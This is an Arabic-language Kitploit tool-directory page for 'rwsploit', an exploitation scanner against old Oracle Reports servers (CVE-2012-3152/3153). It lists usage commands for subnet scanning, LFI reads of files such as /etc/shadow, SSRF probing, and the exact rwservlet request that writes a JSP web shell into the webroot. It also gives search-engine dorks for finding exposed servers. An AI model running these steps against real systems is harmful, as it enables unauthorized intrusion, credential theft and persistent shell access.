Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
rwsploit — ماسح استغلال آلي لخادم تقارير Oracle (rwservlet) — CVE-2012-3152 / CVE-2012-3153. يكتشف، يبصم، يقرأ الملفات عبر LFI، يختبر SSRF عبر webhook، ويرفع قذائف JSP. يستهدف Oracle Reports الإصدارات الأقل من 11g. للاستخدام المصرح به فقط. | Kitploit
أدوات/GitHubGitHub/abq0/rwsploit
الاستطلاعماسحات الثغرات الأمنيةتوليد الحمولةالاستغلالشيل كوداستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالفريق الأحمر
GitHubabq0/rwsploit

rwsploit

ماسح استغلال آلي لخادم تقارير Oracle (rwservlet) — CVE-2012-3152 / CVE-2012-3153. يكتشف، يبصم، يقرأ الملفات عبر LFI، يختبر SSRF عبر webhook، ويرفع قذائف JSP. يستهدف Oracle Reports الإصدارات الأقل من 11g. للاستخدام المصرح به فقط.

6منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع

ماسح Oracle Reports rwservlet

⚠️ للاستخدام المأذون فقط. قم بتشغيل هذه الأداة فقط ضد الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها. الاستخدام غير المأذون غير قانوني.

ماسح استغلال مركّز لخادم Oracle Reports (rwservlet) يستهدف CVE-2012-3152 و CVE-2012-3153 — مما يؤثر على الإصدارات الأقل من 11g. يقوم بأتمتة الكشف، قراءة الملفات عبر LFI، اختبار SSRF، ورفع شيل JSP عبر IPs مفردة، نطاقات CIDR، أو قوائم أهداف. يقوم بالتصفية المسبقة الذكية عبر TCP/HTTP لتخطي المضيفين الميتين فورًا حتى لا يضيع الوقت.


التثبيت

root@kitploit:~
git clone https://github.com/abq0/rwsploit.git
cd rwsploit
pip install requests

مطلوب Python 3.8+. لا توجد تبعيات أخرى.


الاستخدام

root@kitploit:~
python3 rwsploit.py -t <IP|CIDR> [options]
python3 rwsploit.py -f <file>   [options]

قم بتشغيله بدون وسائط لرؤية قائمة المساعدة الكاملة وأدلة الاستطلاع.


الخيارات


أمثلة

root@kitploit:~
# كشف فقط
python3 rwsploit.py -t 10.10.10.55 -p 7777

# كشف + LFI
python3 rwsploit.py -t 10.10.10.55 -p 7777 --lfi

# السلسلة الكاملة — LFI + SSRF + شيل
python3 rwsploit.py -t 10.10.10.55 -p 7777 --lfi --shell

# مسح شبكة فرعية، حفظ التفريغات
python3 rwsploit.py -t 10.10.10.0/24 -p 7777 --lfi -o loot

# من ملف، بدون SSRF
python3 rwsploit.py -f targets.txt --lfi --no-ssrf

تنسيق ملف targets.txt

root@kitploit:~
# تعليق — يتم تخطيه
10.10.10.55
10.10.11.0/24

الميزات

LFI

يقرأ الملفات القابلة للقراءة عمومًا عن طريق اكتشاف نظام التشغيل أولاً عبر showenv، ثم تشغيل مجموعة الحمولات المتطابقة فقط.

Linux — /etc/passwd، /etc/shadow، /etc/hosts، /etc/issue، /etc/os-release، /etc/group، /etc/crontab، /etc/timezone، /proc/version، /proc/cmdline، /proc/self/environ

Windows — win.ini، system32\drivers\etc\hosts، boot.ini، system.ini، AUTOEXEC.BAT

🚨 عدم وجود مخرجات LFI لا يعني أن الهدف آمن — يختلف تكوين Oracle وأذونات الملفات. اختبر دائمًا SSRF ورفع الشيل بشكل مستقل.

SSRF

يطلق rwservlet?JOBTYPE=rwurl&URLPARAMETER=<webhook> ويستقصي واجهة برمجة تطبيقات webhook.site بحثًا عن رد اتصال. يطبع IP المصدر، الطريقة، وUser-Agent عند الاصطدام. يتم إنشاء رمز webhook جديد تلقائيًا عند بدء التشغيل.

رفع الشيل (--shell)

  1. يطلب عنوان URL الذي يخدم محتوى شيل JSP الخاص بك
  2. يقرأ PATH_TRANSLATED من showenv للحصول على مسار جذر الويب الحقيقي
  3. يولد اسم شيل عشوائي (مثال: kxqbrmfa.jsp)
  4. يكتبه عبر: rwservlet?report=xyzzy&destype=file&desname=<webroot\shell.jsp>&JOBTYPE=rwurl&URLPARAMETER=<your URL>
  5. يتحقق عن طريق فحص عنوان URL للشيل بحثًا عن HTTP 200 ويطبع الرابط المباشر

أدلة الاستطلاع — Oracle Reports < v11

Google

root@kitploit:~
inurl:"/reports/rwservlet" -site:oracle.com
inurl:"/reports/rwservlet/showenv"
inurl:"/reports/rwservlet/getserverinfo"
intitle:"Oracle Reports Server - Authenticate" inurl:rwservlet

Shodan

root@kitploit:~
http.html:"rwservlet"
http.html:"/reports/rwservlet" http.html:"Oracle"
http.html:"rwservlet/showenv"
http.html:"getserverinfo" http.html:"Oracle Reports"

FOFA

root@kitploit:~
body="/reports/rwservlet"
body="rwservlet" && body="Oracle Reports"
body="/reports/rwservlet/showenv"
body="getserverinfo" && body="rwservlet"

Censys

root@kitploit:~
services.http.response.body: "/reports/rwservlet"
services.http.response.body: "rwservlet" and services.http.response.body: "Oracle Reports"
services.http.response.body: "rwservlet/showenv"
services.http.response.html_title: "Oracle Reports"

CVEs

CVEالوصف
CVE-2012-3152قراءة ملف غير مصادق عليها عبر معامل report في rwservlet
CVE-2012-3153SSRF وكتابة ملف عبر JOBTYPE=rwurl + URLPARAMETER

يؤثر على Oracle Reports Server 6i، 9i، 10g — تم إصلاحه في 11g.


قانوني

لأغراض اختبار الاختراق المأذون وتحديات CTF والبحث الأمني فقط. لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام.

تنزيل الأداة
العلامةالوصفالافتراضي
-tIP الهدف، اسم المضيف، أو CIDR. يتم قبول قيم متعددة.—
-fملف يحتوي على IP واحد أو CIDR لكل سطر. # = تعليق.—
-pمنفذ مخصص واحد — يتجاوز قائمة المنافذ الافتراضية.80 443 8080 7777 7778 7779 8443 9090
-Tعدد الخيوط المتزامنة.15
-oحفظ تفريغات LFI على القرص بهذه البادئة. مثال: -o loot → loot_<ip>_<port>_<file>.txtstdout فقط
--timeoutمهلة الطلب بالثواني.10
--lfiتشغيل حمولات قراءة ملفات LFI. يتم اكتشاف نظام التشغيل أولاً لذا يتم تشغيل الحمولات ذات الصلة فقط.معطل
--no-ssrfتخطي اختبار webhook SSRF.معطل
--shellرفع شيل JSP. يطلب عنوان URL الذي يخدم محتوى الشيل الخاص بك.معطل
-hعرض المساعدة وأدلة الاستطلاع.—